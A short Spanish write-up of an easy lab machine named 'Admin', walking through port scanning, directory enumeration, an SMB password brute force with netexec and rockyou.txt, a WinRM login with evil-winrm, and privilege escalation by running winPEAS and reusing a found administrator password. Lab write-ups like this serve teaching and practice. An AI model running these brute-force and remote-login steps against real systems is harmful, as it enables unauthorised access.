Admin

🔍 Dificultad: Fácil

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.58

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -p- --open 192.168.1.58 --min-rate 5000 -n

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, los puertos 80, 135, 139, 445, 5040, 5985, 47001 y varios en el rango 49664-49670 están abiertos. Estos pertenecen a los servicios de HTTP, Microsoft RPC, NetBIOS-SSN, Microsoft-DS, WinRM y otros puertos desconocidos, por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p80,135,139,445,5985,47001 -v 192.168.1.58

para obtener más información sobre ese puerto específicamente.

Revisamos el puerto 80.

Revisamos directorios.

gobuster dir -u http://192.168.1.58 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

Encontramos interesante /tasks.txt. Miramos el contenido.

🚀 EXPLOTACIÓN

Encontramos hope como posible usuario. Realizamos fuerza bruta.

netexec smb 192.168.1.58 -u 'hope' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding

Nos conectamos al sistema con evil-winrm.

evil-winrm -i 192.168.1.58 -u "hope" -p "loser"

🔐 PRIVILEGIOS

Subo winPEAS para una búsqueda a fondo para escalar privilegios.

Not found

Ejecutamos. Encontramos un archivo con la contraseña y usuario.

Nos conectamos con evil-winrm. Ya somos root.

evil-winrm -i 192.168.1.58 -u 'administrator' -p 'SuperAdministrator123'

Last updated

Was this helpful?